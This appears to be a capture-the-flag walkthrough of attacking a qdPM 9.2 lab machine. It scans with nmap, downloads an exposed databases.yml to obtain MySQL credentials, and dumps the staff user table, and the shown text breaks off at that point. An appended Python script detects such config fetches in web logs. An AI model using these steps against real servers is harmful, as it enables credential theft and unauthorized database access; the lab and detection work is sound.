SQL misconfiguration and privesc with path vulnerability
1 nmap 10.10.134.21 -sV
  . -sV = probe open ports to determine service/version info.

2 Open the IP in a browser to reach the admin page.
  . qdPM 9.2 = the version shown on the website.

3 Check whether this version is exploitable.
  . The version is exploitable.
  . The last line of the exploit gives the link for downloading the yml file:
    link = http://<website>/core/config/databases.yml

4 Download the yml file to see the username and password for the MySQL database.

5 Check the yml file.

6 Log in to the MySQL database with that username and password.
  # mysql -h 10.10.134.21 -u qdpmadmin -p
  . -h = host
  . -u = username
  . -p = password

7 Show the MySQL databases.
  # show databases;
  . Shows all databases in MySQL.

8 Go to the staff database and show its tables.
  # use staff
  # show tables;
  . These tables hold information about the staff.

9 Show the data in the user table to get the usernames.
  # select * from user;
  . * = select all data.
  . Shows all users.
  . Copy all the users and make a list of them.
    EX:- nano user....
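Steps 3 and 4 work because the web server hands core/config/databases.yml to any client that requests it. As an added example (not part of the original notes), this Python check scans web access logs for fetches of config files under core/config/ and marks which ones succeeded; the combined log format, the sample lines and the function names are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Apache/nginx "combined" log format: ip, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Config files under core/config/ should never be served to a client.
SENSITIVE_RE = re.compile(r'/core/config/[^/]+\.ya?ml$', re.IGNORECASE)


def normalise(target):
    """Decode percent-encoding and collapse ./ and ../ so variants still match."""
    path = unquote(urlsplit(target).path)
    return posixpath.normpath(path)


def find_config_fetches(lines):
    """Return one finding per request for a config file under core/config/."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = normalise(m["target"])
        if not SENSITIVE_RE.search(path):
            continue
        status = int(m["status"])
        # 2xx means the file body (and the DB credentials in it) left the server.
        verdict = "EXPOSED" if 200 <= status < 300 else "blocked"
        findings.append((m["ip"], path, status, verdict))
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /core/config/databases.yml HTTP/1.1" 200 482 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:30 +0000] "GET /core/%63onfig/./databases.yml?x=1 HTTP/1.1" 403 199 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:31 +0000] "GET /docs/config.yml HTTP/1.1" 200 90 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, path, status, verdict in find_config_fetches(SAMPLE_LOG):
        print(f"{verdict:8} {ip:15} {status} {path}")
```

Any EXPOSED finding means the database password in that file should be treated as disclosed and rotated, and the web server should be configured to deny requests for the config directory.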